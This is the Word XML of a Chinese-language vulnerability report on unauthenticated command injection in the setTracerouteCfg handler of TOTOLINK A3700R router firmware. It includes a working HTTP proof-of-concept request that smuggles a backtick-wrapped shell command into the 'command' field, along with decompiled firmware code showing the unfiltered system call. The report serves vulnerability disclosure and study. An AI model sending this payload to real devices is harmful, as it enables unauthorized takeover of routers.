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5306" w14:textId="7BC71B22" w:rsidR="00B85E31" w:rsidRPr="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B85E31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TOTOLINK A3700R_FirmwareV9.1.2u.6134_B20201202存在未授权任意命令注入执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6FF13D" w14:textId="74868ED1" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B85E31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC9A5D" w14:textId="1C59D243" w:rsidR="00B85E31" w:rsidRPr="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B85E31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>本地搭建环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18681559" w14:textId="77777777" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TOTOlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> A3700R </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53C807" w14:textId="22BBC457" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:r>
        <w:t>固件版本：V9.1.2u.6134_B20201202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEAC33E" w14:textId="42FABBB7" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>制造商网站信息：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://www.totolink.net/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08510EFF" w14:textId="77777777" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>固件下载地址：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/207/ids/36.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B90E93" w14:textId="77777777" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31"/>
    <w:p w14:paraId="2DE3E18B" w14:textId="1424F8E3" w:rsidR="00B85E31" w:rsidRPr="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B85E31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62072C4E" w14:textId="34D814A3" w:rsidR="00B85E31" w:rsidRDefault="00B85E31" w:rsidP="00B85E31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cstecgi.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTracerouteCfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>接口存在未授权任意命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599B0C5" w14:textId="38CF1AEC" w:rsidR="009A416B" w:rsidRDefault="009A416B" w:rsidP="00B85E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A416B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA640C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POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cstecgi.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D24D6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Host: 192.168.187.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704ADE9C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Content-Length: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B01B6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Accept: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, */*; q=0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D4582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X-Requested-With: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19B07462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>/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D8A3A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Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C9683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Origin: http://192.168.187.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506BEFC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Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://192.168.187.135/advance/traceroute.html?time=1699627755838</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED9A782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5EFC0E86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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C624E4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Cookie: SESSION_ID=2:1699627746:2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A81FC1E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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B1FB10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F991DE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5DD18E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4063F3" w14:textId="003D219C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{"command":"127.0.0.1`ls&gt;/www/zxs.txt`","num":"4","topicurl":"setTracerouteCfg"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A35BDD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71CCE" w14:textId="4F9B9C6C" w:rsidR="009A416B" w:rsidRDefault="009A416B" w:rsidP="009A416B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到是成功的上传了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413F2CE7" w14:textId="34393F6A" w:rsidR="009A416B" w:rsidRDefault="009A416B" w:rsidP="009A416B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13429B87" wp14:editId="7D555199">
            <wp:extent cx="4924461" cy="3352825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="144415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54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3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ACB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 /aaa.txt HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872D9B0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Host: 192.168.187.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79161AC3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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DA545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>/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A40C8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Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3DDAD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40BBDEFC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026638AD" w14:textId="77777777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Cookie: SESSION_ID=2:1699627746:2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897F19E" w14:textId="2698FC99" w:rsidR="009A416B" w:rsidRDefault="009A416B" w:rsidP="009A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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09E1C2" w14:textId="24CAD0F5" w:rsidR="009A416B" w:rsidRDefault="009A416B" w:rsidP="009A416B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问一下抓到结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21318BA2" w14:textId="3BF95F97" w:rsidR="009A416B" w:rsidRDefault="0068662B" w:rsidP="009A416B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D4FBBF" wp14:editId="78ABBE8A">
            <wp:extent cx="5274310" cy="1773555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1543982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82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61C" w14:textId="07F72FE3" w:rsidR="009A416B" w:rsidRDefault="0068662B" w:rsidP="009A416B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068662B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D21498" w14:textId="51E523F2" w:rsidR="0068662B" w:rsidRDefault="0068662B" w:rsidP="0068662B">
      <w:r w:rsidRPr="0068662B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据抓包，对参数进行搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF4C86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POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cstecgi.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087B4A0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Host: 192.168.187.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21295962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Content-Length: 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56D6CC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Accept: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, */*; q=0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B33EB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X-Requested-With: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11836FC1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>/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A62E71F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Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F499BD1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Origin: http://192.168.187.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB736D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Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://192.168.187.135/advance/traceroute.html?time=1699627755838</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7CF8D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0AA21B7C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08050D90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Cookie: SESSION_ID=2:1699627746:2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E5F28D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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496EFA0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3B63F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E2F5AF" w14:textId="0B238906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{"command":"127.0.0.1","num":"4","topicurl":"setTracerouteCfg"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A920375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79EA5" w14:textId="0EFFBDE1" w:rsidR="0068662B" w:rsidRDefault="0068662B" w:rsidP="0068662B">
      <w:r w:rsidRPr="0068662B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r w:rsidRPr="0068662B">
        <w:t>command，发现只有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进去看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A670E46" w14:textId="57A5313C" w:rsidR="0068662B" w:rsidRDefault="0068662B" w:rsidP="0068662B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="775E9F03" wp14:editId="04073C97">
            <wp:extent cx="5100675" cy="3952904"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="213049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91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675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BB7" w14:textId="4B4D337C" w:rsidR="0068662B" w:rsidRDefault="0068662B" w:rsidP="0068662B">
      <w:r w:rsidRPr="0068662B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0068662B">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0068662B">
        <w:t>处的sub_422504，如下，存在未授权任意命令注入执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297241D8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__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastcall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sub_422504(int a1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54D54F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14880960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const char *Var; // $s2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC5AE7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v3; // $v0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D981E25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v4; // $v0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC93D32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v6[128]; // [sp+18h] [-80h] BYREF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D7324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70CF5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v6, 0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(v6));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68390DE2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Var = (const char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>*)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websGetVar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(a1, "command", "www.baidu.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD6931B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v3 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>websGetVar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>a1, "num", &amp;byte_43AFC8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D66441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v4 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>atoi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(v3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0C563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v6, "traceroute -m %d %s&amp;&gt;/var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>traceRouteLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", v4, Var);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50315482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doSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(v6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83EE80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setResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;word_43908C, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53614DDC" w14:textId="77777777" w:rsidR="0068662B" w:rsidRDefault="0068662B" w:rsidP="00686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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EF81D" w14:textId="6BDF2181" w:rsidR="0068662B" w:rsidRDefault="0068662B" w:rsidP="006B0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1A21D0D" w14:textId="4AA124FC" w:rsidR="0068662B" w:rsidRPr="0068662B" w:rsidRDefault="0068662B" w:rsidP="0068662B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串可控，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dosystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的时候直接对拼接的v6进行执行没有任何过滤直接用反引号闭合就可以任意命令执行了。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0068662B" w:rsidRPr="0068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E975" w14:textId="77777777" w:rsidR="00CB0384" w:rsidRDefault="00CB0384" w:rsidP="00B85E31">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13FCA5AA" w14:textId="77777777" w:rsidR="00CB0384" w:rsidRDefault="00CB0384" w:rsidP="00B8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2732" w14:textId="77777777" w:rsidR="00CB0384" w:rsidRDefault="00CB0384" w:rsidP="00B85E31">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A641908" w14:textId="77777777" w:rsidR="00CB0384" w:rsidRDefault="00CB0384" w:rsidP="00B85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5"/>
    <w:rsid w:val="00263E2C"/>
    <w:rsid w:val="0068662B"/>
    <w:rsid w:val="00694127"/>
    <w:rsid w:val="006B095A"/>
    <w:rsid w:val="009A416B"/>
    <w:rsid w:val="00B1498A"/>
    <w:rsid w:val="00B85E31"/>
    <w:rsid w:val="00CB0384"/>
    <w:rsid w:val="00DF0315"/>
    <w:rsid w:val="00E60683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F799F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB652D3D-53E0-4C35-B189-F9717453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E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E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E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欣顺 张</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>欣顺 张</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-10T15:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-15T07:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>